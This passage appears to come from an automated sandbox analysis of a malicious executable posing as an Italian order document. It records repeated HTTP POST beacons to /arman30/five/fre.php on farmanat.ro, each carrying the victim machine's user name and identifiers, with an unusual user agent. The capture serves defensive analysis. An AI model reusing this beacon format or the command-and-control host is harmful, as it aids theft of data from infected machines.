                                              Nov 25, 2021 10:53:13.477229118 CET7144OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:13.528346062 CET7144INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:12 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              6192.168.11.2049825176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:03.921017885 CET6307OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:03.955220938 CET6307OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:04.006619930 CET6308INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              60192.168.11.2049896176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:39.761326075 CET6392OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:39.795603037 CET6392OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:39.845088005 CET6393INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:38 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              600192.168.11.2050444176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:13.950037956 CET7145OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:13.984283924 CET7145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:14.034276009 CET7145INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              601192.168.11.2050445176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:14.461541891 CET7146OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:14.494992971 CET7146OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:14.544886112 CET7147INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:13 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              602192.168.11.2050446176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:14.963607073 CET7147OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:14.997045040 CET7148OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:15.049539089 CET7148INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              603192.168.11.2050447176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:15.460895061 CET7149OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:15.495127916 CET7149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:15.545490980 CET7149INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:14 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              604192.168.11.2050448176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:15.970796108 CET7150OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:16.004349947 CET7150OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:16.055986881 CET7151INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              605192.168.11.2050449176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:16.443542957 CET7151OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:16.477766037 CET7152OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:16.527874947 CET7152INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:15 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              606192.168.11.2050450176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:16.946928024 CET7153OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:16.980422020 CET7153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:17.030407906 CET7153INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              607192.168.11.2050451176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:17.460875988 CET7154OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:17.495172024 CET7154OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:17.544984102 CET7155INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:16 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              608192.168.11.2050452176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:17.961555958 CET7155OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:17.995796919 CET7156OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:18.047055006 CET7156INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              609192.168.11.2050453176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:18.455843925 CET7157OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:18.489264011 CET7157OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:18.537883043 CET7157INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              61192.168.11.2049897176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:40.218861103 CET6394OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:40.252240896 CET6394OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:40.303121090 CET6394INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:39 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              610192.168.11.2050454176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:18.884130001 CET7158OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:18.918242931 CET7158OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:18.967533112 CET7159INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:17 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              611192.168.11.2050455176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:19.409172058 CET7159OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:19.443325043 CET7160OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:19.500919104 CET7160INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              612192.168.11.2050456176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:19.898077965 CET7161OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:19.931642056 CET7161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:19.988430977 CET7161INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              613192.168.11.2050458176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:20.393989086 CET7163OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:20.427464962 CET7168OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:20.485553980 CET7169INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              614192.168.11.2050459176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:53:20.908344984 CET7170OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:53:20.942959070 CET7170OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:53:20.999043941 CET7171INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:53:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              615192.168.11.2050460176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
